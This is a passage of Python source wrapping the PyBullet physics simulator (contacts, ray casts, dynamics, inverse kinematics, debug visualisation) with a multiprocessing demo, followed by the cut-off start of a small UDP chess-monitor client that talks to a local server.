        np.array[float[3]]: maximum coordinates of the axis-aligned bounding box
    """
    lower, upper = self.sim.getAABB(body_id, link_id)
    return np.asarray(lower), np.asarray(upper)
def get_contact_points(self, body1, body2=None, link1_id=None, link2_id=None):
    """
    Return the contact points computed during the most recent call to `step`.

    Args:
        body1 (int): only report contact points that involve body A
        body2 (int, None): only report contact points that involve body B. Important: you need to have
            a valid body A if you provide body B
        link1_id (int, None): only report contact points that involve this link index of body A
        link2_id (int, None): only report contact points that involve this link index of body B

    Returns:
        list:
            int: contact flag (reserved)
            int: body unique id of body A
            int: body unique id of body B
            int: link index of body A, -1 for base
            int: link index of body B, -1 for base
            np.array[float[3]]: contact position on A, in Cartesian world coordinates
            np.array[float[3]]: contact position on B, in Cartesian world coordinates
            np.array[float[3]]: contact normal on B, pointing towards A
            float: contact distance, positive for separation, negative for penetration
            float: normal force applied during the last `step`
            float: lateral friction force in the first lateral friction direction
            np.array[float[3]]: first lateral friction direction
            float: lateral friction force in the second lateral friction direction
            np.array[float[3]]: second lateral friction direction
    """
    # Only forward the filters that were actually provided.
    kwargs = {}
    for name, value in (('bodyA', body1), ('linkIndexA', link1_id),
                        ('bodyB', body2), ('linkIndexB', link2_id)):
        if value is not None:
            kwargs[name] = value
    points = self.sim.getContactPoints(**kwargs)
    if not points:
        return points
    # Indices 5, 6, 7, 11, 13 hold 3-vectors; convert those to numpy arrays.
    vector_idx = (5, 6, 7, 11, 13)
    return [[np.asarray(field) if idx in vector_idx else field
             for idx, field in enumerate(point[:14])] for point in points]
def get_closest_points(self, body1, body2, distance, link1_id=None, link2_id=None):
    """
    Compute the closest points between two bodies, independently from `step`. This also lets you
    compute closest points of objects with an arbitrary separating distance. In this query there will
    be no normal forces reported.

    Args:
        body1 (int): only report points that involve body A
        body2 (int): only report points that involve body B. Important: you need to have a valid body A
            if you provide body B
        distance (float): if the distance between objects exceeds this maximum distance, no points may
            be returned.
        link1_id (int): only report points that involve this link index of body A
        link2_id (int): only report points that involve this link index of body B

    Returns:
        list:
            int: contact flag (reserved)
            int: body unique id of body A
            int: body unique id of body B
            int: link index of body A, -1 for base
            int: link index of body B, -1 for base
            np.array[float[3]]: contact position on A, in Cartesian world coordinates
            np.array[float[3]]: contact position on B, in Cartesian world coordinates
            np.array[float[3]]: contact normal on B, pointing towards A
            float: contact distance, positive for separation, negative for penetration
            float: normal force applied during the last `step`. Always equal to 0.
            float: lateral friction force in the first lateral friction direction
            np.array[float[3]]: first lateral friction direction
            float: lateral friction force in the second lateral friction direction
            np.array[float[3]]: second lateral friction direction
    """
    # Only forward the link filters that were actually provided.
    kwargs = {}
    for name, value in (('linkIndexA', link1_id), ('linkIndexB', link2_id)):
        if value is not None:
            kwargs[name] = value
    points = self.sim.getClosestPoints(body1, body2, distance, **kwargs)
    if not points:
        return points
    # Indices 5, 6, 7, 11, 13 hold 3-vectors; convert those to numpy arrays.
    vector_idx = (5, 6, 7, 11, 13)
    return [[np.asarray(field) if idx in vector_idx else field
             for idx, field in enumerate(point[:14])] for point in points]
def ray_test(self, from_position, to_position):
    """
    Perform a single raycast and return the intersection information of the first object hit.

    Args:
        from_position (np.array[float[3]]): start of the ray in world coordinates
        to_position (np.array[float[3]]): end of the ray in world coordinates

    Returns:
        list:
            int: object unique id of the hit object
            int: link index of the hit object, or -1 if none/parent
            float: hit fraction along the ray, in the range [0, 1]
            np.array[float[3]]: hit position in Cartesian world coordinates
            np.array[float[3]]: hit normal in Cartesian world coordinates
    """
    # PyBullet expects plain sequences; flatten numpy arrays to lists.
    endpoints = [pos.ravel().tolist() if isinstance(pos, np.ndarray) else pos
                 for pos in (from_position, to_position)]
    hits = self.sim.rayTest(endpoints[0], endpoints[1])
    return [[hit[0], hit[1], hit[2], np.asarray(hit[3]), np.asarray(hit[4])] for hit in hits]
def ray_test_batch(self, from_positions, to_positions, parent_object_id=None, parent_link_id=None):
    """Perform a batch of raycasts and return the intersection information of the first objects hit.

    This is similar to `ray_test`, but accepts arrays of rays for faster execution. The size of
    `from_positions` needs to be equal to the size of `to_positions`. You get one result per ray, even
    if there is no intersection: check the object unique id field — if it is -1, there is no hit, and
    the hit fraction is 1. The maximum number of rays per batch is
    `pybullet.MAX_RAY_INTERSECTION_BATCH_SIZE`.

    Args:
        from_positions (np.array[float[N,3]]): list of start points for each ray, in world coordinates
        to_positions (np.array[float[N,3]]): list of end points for each ray, in world coordinates
        parent_object_id (int): ray from/to is in local space of a parent object
        parent_link_id (int): ray from/to is in local space of a parent object

    Returns:
        list:
            int: object unique id of the hit object
            int: link index of the hit object, or -1 if none/parent
            float: hit fraction along the ray, in the range [0, 1]
            np.array[float[3]]: hit position in Cartesian world coordinates
            np.array[float[3]]: hit normal in Cartesian world coordinates
    """
    # PyBullet expects plain nested sequences; convert numpy arrays to lists.
    if isinstance(from_positions, np.ndarray):
        from_positions = from_positions.tolist()
    if isinstance(to_positions, np.ndarray):
        to_positions = to_positions.tolist()
    # Only forward the parent-frame options that were actually provided.
    kwargs = {}
    for name, value in (('parentObjectUniqueId', parent_object_id), ('parentLinkIndex', parent_link_id)):
        if value is not None:
            kwargs[name] = value
    hits = self.sim.rayTestBatch(from_positions, to_positions, **kwargs)
    if not hits:
        return hits
    return [[hit[0], hit[1], hit[2], np.asarray(hit[3]), np.asarray(hit[4])] for hit in hits]
def set_collision_filter_group_mask(self, body_id, link_id, filter_group, filter_mask):
    """
    Enable/disable collision detection between groups of objects.

    Each body is part of a group. It collides with other bodies if their group matches the mask, and
    vice versa. The check is performed using the group and mask of the two bodies involved, and
    depends on the collision filter mode.

    Args:
        body_id (int): unique id of the body to be configured
        link_id (int): link index of the body to be configured
        filter_group (int): bitwise group of the filter
        filter_mask (int): bitwise mask of the filter
    """
    self.sim.setCollisionFilterGroupMask(body_id, link_id, filter_group, filter_mask)
def set_collision_filter_pair(self, body1, body2, link1=-1, link2=-1, enable=True):
    """
    Enable/disable collision between a specific pair of bodies/links.

    Args:
        body1 (int): unique id of body A to be filtered
        body2 (int): unique id of body B to be filtered; A == B implies self-collision
        link1 (int): link index of body A
        link2 (int): link index of body B
        enable (bool): True to enable collision, False to disable collision
    """
    # PyBullet expects the enable flag as an int.
    self.sim.setCollisionFilterPair(body1, body2, link1, link2, int(enable))
###########################
# Kinematics and Dynamics #
###########################
def get_dynamics_info(self, body_id, link_id=-1):
    """
    Get dynamics information such as the mass, center of mass, friction and other properties of the
    base and links.

    Args:
        body_id (int): body/object unique id.
        link_id (int): link/joint index or -1 for the base.

    Returns:
        float: mass in kg
        float: lateral friction coefficient
        np.array[float[3]]: local inertia diagonal. Note that links and base are centered around the
            center of mass and aligned with the principal axes of inertia.
        np.array[float[3]]: position of inertial frame in local coordinates of the joint frame
        np.array[float[4]]: orientation of inertial frame in local coordinates of joint frame
        float: coefficient of restitution
        float: rolling friction coefficient orthogonal to contact normal
        float: spinning friction coefficient around contact normal
        float: damping of contact constraints. -1 if not available.
        float: stiffness of contact constraints. -1 if not available.
    """
    info = list(self.sim.getDynamicsInfo(body_id, link_id))
    # Fields 2-4 (inertia diagonal, inertial position, inertial orientation) are vectors.
    info[2:5] = [np.asarray(value) for value in info[2:5]]
    return info
def change_dynamics(self, body_id, link_id=-1, mass=None, lateral_friction=None, spinning_friction=None,
                    rolling_friction=None, restitution=None, linear_damping=None, angular_damping=None,
                    contact_stiffness=None, contact_damping=None, friction_anchor=None,
                    local_inertia_diagonal=None, inertia_position=None, inertia_orientation=None,
                    joint_damping=None, joint_friction=None):
    """Change dynamic properties (mass, friction, restitution, ...) of a body or link.

    Only the parameters that are not None are forwarded to the simulator.

    Args:
        body_id (int): object unique id, as returned by `load_urdf`, etc.
        link_id (int): link index, or -1 for the base.
        mass (float): new mass of the link (or base for link index -1).
        lateral_friction (float): lateral (linear) contact friction.
        spinning_friction (float): torsional friction around the contact normal.
        rolling_friction (float): torsional friction orthogonal to the contact normal.
        restitution (float): bounciness of contact; keep it a bit below 1.
        linear_damping (float): linear damping of the link (0.04 by default).
        angular_damping (float): angular damping of the link (0.04 by default).
        contact_stiffness (float): stiffness of the contact constraints; used together
            with `contact_damping`.
        contact_damping (float): damping of the contact constraints; overrides any value
            given in the URDF contact section.
        friction_anchor (int): enable/disable the positional friction correction
            (disabled by default unless set in the URDF contact section).
        local_inertia_diagonal (np.array[float[3]]): diagonal of the inertia tensor,
            expressed in the principal-axes frame centered at the center of mass.
        inertia_position (np.array[float[3]]): new inertia position w.r.t. the link frame.
        inertia_orientation (np.array[float[4]]): new inertia orientation (quaternion
            [x,y,z,w]) w.r.t. the link frame.
        joint_damping (float): joint damping coefficient
            (`joint_damping_force = -damping_coefficient * joint_velocity`).
        joint_friction (float): joint friction coefficient.
    """
    # map each accepted keyword onto the corresponding PyBullet argument name
    options = (('mass', mass),
               ('lateralFriction', lateral_friction),
               ('spinningFriction', spinning_friction),
               ('rollingFriction', rolling_friction),
               ('restitution', restitution),
               ('linearDamping', linear_damping),
               ('angularDamping', angular_damping),
               ('contactStiffness', contact_stiffness),
               ('contactDamping', contact_damping),
               ('frictionAnchor', friction_anchor),
               ('localInertiaDiagonal', local_inertia_diagonal),
               ('jointDamping', joint_damping))
    kwargs = {name: value for name, value in options if value is not None}
    # NOTE(review): `inertia_position`, `inertia_orientation` and `joint_friction` are
    # accepted but never forwarded (pybullet's changeDynamics exposes no matching
    # options here) — kept only for interface compatibility; confirm callers expect this.
    self.sim.changeDynamics(body_id, link_id, **kwargs)
def calculate_jacobian(self, body_id, link_id, local_position, q, dq, des_ddq):
    r"""Return the full geometric Jacobian :math:`J(q) = [J_{lin}(q)^T, J_{ang}(q)^T]^T`.

    It satisfies :math:`v = [\dot{p}^T, \omega^T]^T = J(q) \dot{q}`, where
    :math:`\dot{p}` is the link's Cartesian linear velocity and :math:`\omega` its
    angular velocity.

    Warnings: with a floating base, the Jacobian also contains columns for the root-link
    DoFs (at the beginning); with a fixed base it only has columns for the joints.

    Args:
        body_id (int): unique body id.
        link_id (int): link id.
        local_position (np.array[float[3]]): point on the link (in link-local coordinates
            around its center of mass) at which the Jacobian is computed; None uses the
            CoM position in the link frame.
        q (np.array[float[N]]): joint positions (N = number of DoFs).
        dq (np.array[float[N]]): joint velocities.
        des_ddq (np.array[float[N]]): desired joint accelerations.

    Returns:
        np.array[float[6,N]], np.array[float[6,6+N]]: stacked linear and angular Jacobian;
            the number of columns depends on whether the base is fixed or floating.
    """
    def to_list(value):
        # pybullet only accepts plain lists for these arguments, not numpy arrays
        return value.ravel().tolist() if isinstance(value, np.ndarray) else value

    lin_jac, ang_jac = self.sim.calculateJacobian(body_id, link_id,
                                                  localPosition=to_list(local_position),
                                                  objPositions=to_list(q),
                                                  objVelocities=to_list(dq),
                                                  objAccelerations=to_list(des_ddq))
    # stack the linear part on top of the angular part
    return np.vstack((lin_jac, ang_jac))
def calculate_mass_matrix(self, body_id, q):
    r"""Return the joint-space mass/inertia matrix :math:`H(q)`.

    It appears in the rigid-body equation of motion
    :math:`\tau = H(q)\ddot{q} + C(q,\dot{q})`.

    Warnings: with a floating base the result is [6+N,6+N]; with a fixed base it is
    [N,N], where N is the number of actuated joints.

    Args:
        body_id (int): body unique id.
        q (np.array[float[N]]): joint positions of size N (total number of DoFs).

    Returns:
        np.array: inertia matrix ([N,N] or [6+N,6+N]).
    """
    # pybullet rejects numpy arrays here, so flatten to a plain list first
    joint_positions = q.ravel().tolist() if isinstance(q, np.ndarray) else q
    return np.asarray(self.sim.calculateMassMatrix(body_id, joint_positions))
def calculate_inverse_kinematics(self, body_id, link_id, position, orientation=None, lower_limits=None,
                                 upper_limits=None, joint_ranges=None, rest_poses=None, joint_dampings=None,
                                 solver=None, q_curr=None, max_iters=None, threshold=None):
    r"""Compute the full inverse kinematics: a position for every actuated joint.

    Internally Bullet uses a Damped Least Squares IK solver (Samuel Buss' library), with
    optional null-space support. Null-space IK is used only when ALL FOUR of
    `lower_limits`, `upper_limits`, `joint_ranges` and `rest_poses` are provided;
    otherwise regular IK runs.

    Args:
        body_id (int): body unique id.
        link_id (int): end-effector link index.
        position (np.array[float[3]]): target end-effector position (link frame, not CoM).
            In Cartesian world space, unless `q_curr` is given.
        orientation (np.array[float[4]]): target orientation, quaternion [x,y,z,w]; if
            omitted, pure position IK is used.
        lower_limits (np.array[float[N]]): lower joint limits (null-space IK).
        upper_limits (np.array[float[N]]): upper joint limits (null-space IK).
        joint_ranges (np.array[float[N]]): range of each joint (null-space IK).
        rest_poses (np.array[float[N]]): favored rest pose (null-space IK).
        joint_dampings (np.array[float[N]]): per-joint damping factors for the solution.
        solver (int): p.IK_DLS (=0) or p.IK_SDLS (=1).
        q_curr (np.array[float[N]]): current joint positions; when given, the targets are
            interpreted in local space.
        max_iters (int): maximum number of solver iterations.
        threshold (float): residual threshold to stop refining the solution.

    Returns:
        np.array[float[N]]: joint positions for each actuated joint.
    """
    def to_list(value):
        # pybullet does not accept numpy arrays for these arguments
        return value.ravel().tolist() if isinstance(value, np.ndarray) else value

    kwargs = {}
    if orientation is not None:
        kwargs['targetOrientation'] = to_list(orientation)
    null_space = (lower_limits, upper_limits, joint_ranges, rest_poses)
    if all(argument is not None for argument in null_space):
        kwargs['lowerLimits'] = lower_limits
        kwargs['upperLimits'] = upper_limits
        kwargs['jointRanges'] = joint_ranges
        kwargs['restPoses'] = rest_poses
    if q_curr is not None:
        kwargs['currentPosition'] = to_list(q_curr)
    if joint_dampings is not None:
        kwargs['jointDamping'] = to_list(joint_dampings)
    if solver is not None:
        kwargs['solver'] = solver
    if max_iters is not None:
        kwargs['maxNumIterations'] = max_iters
    if threshold is not None:
        kwargs['residualThreshold'] = threshold
    return np.asarray(self.sim.calculateInverseKinematics(body_id, link_id, position, **kwargs))
def calculate_inverse_dynamics(self, body_id, q, dq, des_ddq):
    r"""Compute the joint torques for desired joint accelerations (inverse dynamics).

    Starting from joint positions :math:`q` and velocities :math:`\dot{q}`, compute the
    torques :math:`\tau = ID(model, q, \dot{q}, \ddot{q}_{des})` using the joint-space
    equation of motion :math:`\tau = H(q)\ddot{q} + C(q,\dot{q})`, where :math:`H` is
    the inertia matrix and :math:`C` collects Coriolis, centrifugal, gravity and other
    non-applied forces.

    With zero desired accelerations this returns
    :math:`\tau = S(q,\dot{q})\dot{q} + g(q)`; with zero velocities as well it returns
    :math:`\tau = g(q)`, e.g. for gravity compensation.

    Args:
        body_id (int): body unique id.
        q (np.array[float[N]]): joint positions.
        dq (np.array[float[N]]): joint velocities.
        des_ddq (np.array[float[N]]): desired joint accelerations.

    Returns:
        np.array[float[N]]: joint torques.

    References:
        - [1] "Rigid Body Dynamics Algorithms", Featherstone, 2008, chap1.1
        - [2] "Robotics: Modelling, Planning and Control", Siciliano et al., 2010
        - [3] "Springer Handbook of Robotics", Siciliano et al., 2008
        - [4] Lecture on "Impedance Control" by Prof. De Luca, Universita di Roma,
            http://www.diag.uniroma1.it/~deluca/rob2_en/15_ImpedanceControl.pdf
    """
    # pybullet requires plain lists; flatten any numpy array inputs
    arguments = [value.ravel().tolist() if isinstance(value, np.ndarray) else value
                 for value in (q, dq, des_ddq)]
    return np.asarray(self.sim.calculateInverseDynamics(body_id, *arguments))
def calculate_forward_dynamics(self, body_id, q, dq, torques):
    r"""Compute the joint accelerations for given joint torques (forward dynamics).

    Given joint positions :math:`q`, velocities :math:`\dot{q}` and torques
    :math:`\tau`, compute :math:`\ddot{q} = FD(model, q, \dot{q}, \tau)` from the
    joint-space equation of motion
    :math:`\ddot{q} = H(q)^{-1} (\tau - C(q,\dot{q}))`, where :math:`H` is the inertia
    matrix and :math:`C` collects Coriolis, centrifugal, gravity and other non-applied
    forces.

    With zero torques this returns
    :math:`\ddot{q} = -H(q)^{-1}(S(q,\dot{q})\dot{q} + g(q))`; with zero velocities as
    well it returns the accelerations due to gravity alone.

    Args:
        body_id (int): unique body id.
        q (np.array[float[N]]): joint positions.
        dq (np.array[float[N]]): joint velocities.
        torques (np.array[float[N]]): applied joint torques.

    Returns:
        np.array[float[N]]: joint accelerations.

    References:
        - [1] "Rigid Body Dynamics Algorithms", Featherstone, 2008, chap1.1
        - [2] "Robotics: Modelling, Planning and Control", Siciliano et al., 2010
        - [3] "Springer Handbook of Robotics", Siciliano et al., 2008
        - [4] Lecture on "Impedance Control" by Prof. De Luca, Universita di Roma,
            http://www.diag.uniroma1.it/~deluca/rob2_en/15_ImpedanceControl.pdf
    """
    # convert numpy arrays to lists (pybullet requirement; dq is converted downstream)
    if isinstance(q, np.ndarray):
        q = q.ravel().tolist()
    torques = np.asarray(torques)
    H = self.calculate_mass_matrix(body_id, q)
    # C(q, dq) is the torque needed for zero acceleration
    C = self.calculate_inverse_dynamics(body_id, q, dq, np.zeros(len(q)))
    # solve H * ddq = tau - C directly: np.linalg.solve is faster and numerically more
    # stable than forming the explicit inverse H^{-1} and multiplying
    return np.linalg.solve(H, torques - C)
#########
# Debug #
#########
def add_user_debug_line(self, from_pos, to_pos, rgb_color=None, width=None, lifetime=None, parent_object_id=None,
                        parent_link_id=None, line_id=None):
    """Add (or replace) a 3D debug line in the simulator.

    Args:
        from_pos (np.array[float[3]]): start point, in Cartesian world coordinates.
        to_pos (np.array[float[3]]): end point, in Cartesian world coordinates.
        rgb_color (np.array[float[3]]): RGB color, each channel in [0,1].
        width (float): line width (limited by the OpenGL implementation).
        lifetime (float): 0 for a permanent line, or a positive duration in seconds
            after which the line is removed automatically.
        parent_object_id (int): draw the line in the local frame of this parent object.
        parent_link_id (int): draw the line in the local frame of this parent link.
        line_id (int): id of an existing line to replace (avoids remove/add flicker).

    Returns:
        int: unique user debug line id.
    """
    # forward only the options the caller actually provided
    options = (('lineColorRGB', rgb_color), ('lineWidth', width), ('lifeTime', lifetime),
               ('parentObjectUniqueId', parent_object_id), ('parentLinkIndex', parent_link_id),
               ('replaceItemUniqueId', line_id))
    kwargs = {name: value for name, value in options if value is not None}
    return self.sim.addUserDebugLine(lineFromXYZ=from_pos, lineToXYZ=to_pos, **kwargs)
def add_user_debug_text(self, text, position, rgb_color=None, size=None, lifetime=None, orientation=None,
                        parent_object_id=None, parent_link_id=None, text_id=None):
    """Add (or replace) 3D debug text at a given location.

    Args:
        text (str): text to display.
        position (np.array[float[3]]): text position, in Cartesian world coordinates.
        rgb_color (list/tuple of 3 floats): RGB color, each component in [0,1].
        size (float): text size.
        lifetime (float): 0 for permanent text, or a positive duration in seconds after
            which the text is removed automatically.
        orientation (np.array[float[4]]): fixed text orientation (quaternion) in world or
            parent-local space. By default text always faces the camera (bitmap fonts);
            oriented text uses a different shader with TrueType fonts.
        parent_object_id (int): draw the text in the local frame of this parent object.
        parent_link_id (int): draw the text in the local frame of this parent link.
        text_id (int): id of an existing text item to replace (avoids flicker).

    Returns:
        int: unique user debug text id.
    """
    # forward only the options the caller actually provided
    options = (('textColorRGB', rgb_color), ('textSize', size), ('lifeTime', lifetime),
               ('textOrientation', orientation), ('parentObjectUniqueId', parent_object_id),
               ('parentLinkIndex', parent_link_id), ('replaceItemUniqueId', text_id))
    kwargs = {name: value for name, value in options if value is not None}
    return self.sim.addUserDebugText(text=text, textPosition=position, **kwargs)
def add_user_debug_parameter(self, name, min_range, max_range, start_value):
    """Add a custom slider to the GUI for tuning a parameter at runtime.

    Args:
        name (str): label of the slider.
        min_range (float): minimum slider value.
        max_range (float): maximum slider value.
        start_value (float): initial slider value.

    Returns:
        int: unique user debug parameter id.
    """
    return self.sim.addUserDebugParameter(paramName=name, rangeMin=min_range,
                                          rangeMax=max_range, startValue=start_value)
def read_user_debug_parameter(self, parameter_id):
    """Read the current value of a GUI slider parameter.

    Args:
        parameter_id (int): unique user debug parameter id.

    Returns:
        float: current slider value.
    """
    return self.sim.readUserDebugParameter(parameter_id)
def remove_user_debug_item(self, item_id):
    """Remove one user debug item (line, text, parameter) from the simulator.

    Args:
        item_id (int): unique id of the debug item to remove.
    """
    self.sim.removeUserDebugItem(item_id)
def remove_all_user_debug_items(self):
    """Remove every user debug item (lines, texts, parameters) from the simulator."""
    self.sim.removeAllUserDebugItems()
def set_debug_object_color(self, object_id, link_id, rgb_color=(1, 0, 0)):
    """Override the debug color of a specific object link.

    Args:
        object_id (int): unique object id.
        link_id (int): link id.
        rgb_color (float[3]): RGB debug color (defaults to red).
    """
    self.sim.setDebugObjectColor(object_id, link_id, rgb_color)
def add_user_data(self, object_id, key, value):
    """Attach a user data string to a body/link, overriding any previous value.

    Multiple user data entries can be attached to the same body/link.

    Args:
        object_id (int): unique object/link id.
        key (str): key string.
        value (str): value string.

    Returns:
        int: user data id.
    """
    return self.sim.addUserData(object_id, key, value)
def num_user_data(self, object_id):
    """Return how many user data entries are attached to the given object/link.

    Args:
        object_id (int): unique object/link id.

    Returns:
        int: number of user data entries.
    """
    return self.sim.getNumUserData(object_id)
def get_user_data(self, user_data_id):
    """Return the value stored under the given user data id.

    Args:
        user_data_id (int): unique user data id.

    Returns:
        str: value string.
    """
    return self.sim.getUserData(user_data_id)
def get_user_data_id(self, object_id, key):
    """Look up the user data id stored under a key for the given object/link.

    Args:
        object_id (int): unique object/link id.
        key (str): key string.

    Returns:
        int: user data id.
    """
    return self.sim.getUserDataId(object_id, key)
def get_user_data_info(self, object_id, index):
    """Return the user data entry of an object at the given index.

    Args:
        object_id (int): unique object id.
        index (int): entry index, in [0, self.num_user_data(object_id)].

    Returns:
        int: user data id.
        str: key.
        int: body id.
        int: link index.
        int: visual shape index.
    """
    return self.sim.getUserDataInfo(object_id, index)
def remove_user_data(self, user_data_id):
    """Remove the user data entry with the given id.

    Args:
        user_data_id (int): user data id.
    """
    self.sim.removeUserData(user_data_id)
def sync_user_data(self):
    """Synchronize the user data cache with the simulator."""
    self.sim.syncUserData()
def configure_debug_visualizer(self, flag, enable):
    """Enable or disable a feature of the built-in OpenGL debug visualizer.

    Args:
        flag (int): the feature to toggle, e.g.:
            COV_ENABLE_GUI (=1), COV_ENABLE_SHADOWS (=2), COV_ENABLE_WIREFRAME (=3),
            COV_ENABLE_VR_TELEPORTING (=4), COV_ENABLE_VR_PICKING (=5),
            COV_ENABLE_VR_RENDER_CONTROLLERS (=6), COV_ENABLE_RENDERING (=7),
            COV_ENABLE_KEYBOARD_SHORTCUTS (=9), COV_ENABLE_MOUSE_PICKING (=10),
            COV_ENABLE_Y_AXIS_UP (=11, Z is the default world up axis),
            COV_ENABLE_TINY_RENDERER (=12), COV_ENABLE_RGB_BUFFER_PREVIEW (=13),
            COV_ENABLE_DEPTH_BUFFER_PREVIEW (=14),
            COV_ENABLE_SEGMENTATION_MARK_PREVIEW (=15).
        enable (bool): True to enable the feature, False to disable it.
    """
    # the simulator expects an integer flag rather than a bool
    self.sim.configureDebugVisualizer(flag, int(enable))
def get_debug_visualizer(self):
    """Return information about the debug visualizer camera.

    Returns:
        int: width of the visualizer camera.
        int: height of the visualizer camera.
        np.array[float[4,4]]: view matrix.
        np.array[float[4,4]]: perspective projection matrix.
        np.array[float[3]]: camera up vector, in Cartesian world space.
        np.array[float[3]]: camera forward axis, in Cartesian world space.
        np.array[float[3]]: horizontal vector, usable to generate rays (e.g. for mouse
            picking or a simple ray tracer).
        np.array[float[3]]: vertical vector, usable to generate rays.
        float: camera yaw angle (in radians), in Cartesian local space coordinates.
        float: camera pitch angle (in radians), in Cartesian local space coordinates.
        float: distance between the camera and its target.
        np.array[float[3]]: camera target, in Cartesian world space coordinates.
    """
    camera = self.sim.getDebugVisualizerCamera()
    width, height, view, proj, up_vec, forward_vec, horizontal, vertical, yaw, pitch, dist, target = camera
    # the matrices come back in column-major order: reshape, then transpose to row-major
    view = np.asarray(view).reshape(4, 4).T
    proj = np.asarray(proj).reshape(4, 4).T
    up_vec, forward_vec, horizontal, vertical, target = (
        np.asarray(vector) for vector in (up_vec, forward_vec, horizontal, vertical, target))
    # pybullet reports camera angles in degrees; this API exposes radians
    return (width, height, view, proj, up_vec, forward_vec, horizontal, vertical,
            np.deg2rad(yaw), np.deg2rad(pitch), dist, target)
def reset_debug_visualizer(self, distance, yaw, pitch, target_position):
    """Reset the 3D OpenGL debug visualizer camera pose.

    Args:
        distance (float): distance from the eye to the camera target.
        yaw (float): camera yaw angle (in radians), left/right.
        pitch (float): camera pitch angle (in radians), up/down.
        target_position (np.array[float[3]]): focus point of the camera.
    """
    # pybullet expects the camera angles in degrees
    yaw_deg = np.rad2deg(yaw)
    pitch_deg = np.rad2deg(pitch)
    self.sim.resetDebugVisualizerCamera(cameraDistance=distance, cameraYaw=yaw_deg,
                                        cameraPitch=pitch_deg, cameraTargetPosition=target_position)
############################
# Events (mouse, keyboard) #
############################
def get_keyboard_events(self):
    """Return the pending keyboard events.

    Returns:
        dict: {keyId: keyState} where `keyId` is the integer (ascii) key code (special
            keys use pybullet constants such as `B3G_SHIFT`, `B3G_LEFT_ARROW`, ...) and
            `keyState` is 3 if the button has been pressed, 1 if the key is down, and 2
            if the key has been triggered.
    """
    return self.sim.getKeyboardEvents()
def get_mouse_events(self):
    """Return the pending mouse events.

    Returns:
        list: mouse events, each with:
            eventType (int): 1 if the mouse moved, 2 if a button was pressed/released.
            mousePosX (float): x-coordinate of the mouse pointer.
            mousePosY (float): y-coordinate of the mouse pointer.
            buttonIdx (int): -1 none, 0 left, 1 scroll wheel (pressed), 2 right button.
            buttonState (int): 0 nothing, 3 pressed, 4 released, 1 key down (never
                observed), 2 triggered (never observed).
    """
    return self.sim.getMouseEvents()
def get_mouse_and_keyboard_events(self):
    """Return the pending mouse and keyboard events in one call.

    Returns:
        list: list of mouse events (see `get_mouse_events`).
        dict: dictionary of key events (see `get_keyboard_events`).
    """
    mouse_events = self.sim.getMouseEvents()
    key_events = self.sim.getKeyboardEvents()
    return mouse_events, key_events
# Tests
if __name__ == "__main__":
    # The following snippet code will test the `multiprocessing` library with the `Bullet` simulator in the GUI mode.
    # We spawn 2 other processes, thus counting the main process, there are 3 processes in total.
    # In the main one, you will just see the world with only the floor. In the two others, you will see that a ball
    # has been added. The main process communicates with the 2 slave processes via pipes; it notably asks them to
    # start to drop the ball or to exit. Once the simulation is over, it will return if the ball has been in contact
    # with the floor at the last time step via a queue.
    import multiprocessing
    # define variables
    num_processes = 2
    # create simulator
    sim = Bullet(render=True)
    sim.configure_debug_visualizer(sim.COV_ENABLE_GUI, 0)
    sim.set_gravity([0., 0., -9.81])
    # load floor and sphere
    sim.load_urdf('plane.urdf', use_fixed_base=True, scale=1.)
    # sim.load_urdf("sphere_small.urdf", position=[0, 0, 3])
    # print info
    print("Available URDFs: {}".format(sim.get_available_urdfs(fullpath=False)))
    # print("Available SDFs: {}".format(sim.get_available_sdfs(fullpath=False)))
    # print("Available MJCFs: {}".format(sim.get_available_mjcfs(fullpath=False)))
    # print("Available OBJs: {}".format(sim.get_available_objs(fullpath=False)))
    # hide the simulator (i.e. switch to DIRECT mode)
    sim.hide()
    # target function for each process
    def function(pipe, queue, simulator):
        # NOTE(review): each worker re-creates its own simulator from the class and
        # kwargs of the one passed in (a live simulator handle cannot be shared
        # across processes) — presumably `simulator.kwargs`/`simulator.camera` are
        # set by the Bullet constructor; confirm against the class definition.
        process = multiprocessing.current_process()
        print("{}: start".format(process.name))
        # get info from previous simulator
        class_ = simulator.__class__
        kwargs = simulator.kwargs
        # create simulator and world (with visualization)
        print("{}: create simulator and world".format(process.name))
        sim = class_(render=True)
        sim.reset_scene_camera(simulator.camera)
        sim.configure_debug_visualizer(sim.COV_ENABLE_GUI, 0)
        sim.set_gravity([0., 0., -9.81])
        floor = sim.load_urdf('plane.urdf', use_fixed_base=True, scale=1.)
        sphere = sim.load_urdf("sphere_small.urdf", position=[0, 0, 3])
        while True:
            print("{}: waiting for message...".format(process.name))
            # blocks until the parent sends a command through the pipe
            msg = pipe.recv()
            print("{}: received msg: {}".format(process.name, msg))
            if msg == 'stop':
                break
            else:
                print('{}: running simulator'.format(process.name))
                in_contact = None
                for t in range(4000):
                    in_contact = len(sim.get_contact_points(sphere, floor))
                    sim.step(1. / 254)
                # report whether the sphere touched the floor at the last time step
                queue.put([process.name, in_contact])
        print("{}: end process".format(process.name))
        pipe.close()
    # create queue, pipe, and processes
    print('creating queue, pipe, and processes')
    queue = multiprocessing.Queue()
    pipes = [multiprocessing.Pipe() for _ in range(num_processes)]
    processes = [multiprocessing.Process(target=function, args=(pipe[1], queue, sim)) for pipe in pipes]
    # start the processes
    time.sleep(1.)
    print('Start the processes')
    for process in processes:
        process.start()
    # render back the simulator
    sim.render()
    # send msgs to each process to run the simulation
    time.sleep(5)
    print('Run each process')
    for pipe in pipes:
        pipe[0].send('run')
    # get results from queue
    print('Get the results from each process')
    for _ in range(num_processes):
        result = queue.get()
        print("Result: {}".format(result))
    # send msgs to each process to end the simulation
    print('Stop each process')
    for pipe in pipes:
        pipe[0].send('stop')
    # join the processes
    for process in processes:
        process.join()
    print('END')
|
ChessMonitorClient.py | import threading
from client.UDPClient import UDPClient
from client.msg_parser import parse_cmd
class ChessMonitorClient(UDPClient):
    """UDP client that registers with a chess-solver server and forwards board
    updates to a chess-board widget."""

    def __init__(self, chess_board, server_addr=("localhost", 9998)):
        super().__init__()
        # background receiver thread; daemonized so it never blocks interpreter shutdown
        self.client_thread = threading.Thread(target=self.__recv_loop)
        self.client_thread.daemon = True
        self.server_addr = server_addr
        self.chess_board = chess_board

    def init(self):
        """Register this monitor with the server, then start the receive loop."""
        self.sendto('init_monitor', self.server_addr)
        data, addr = self.recvfrom()
        print('Received', data, 'from', addr)
        self.client_thread.start()

    def start(self):
        """Send the board parameters to the server and ask it to start solving."""
        for request in ('set_params 12 12', 'start_solving'):
            self.sendto(request, self.server_addr)

    def __recv_loop(self):
        # runs forever on the daemon thread, dispatching each parsed command to the board
        while True:
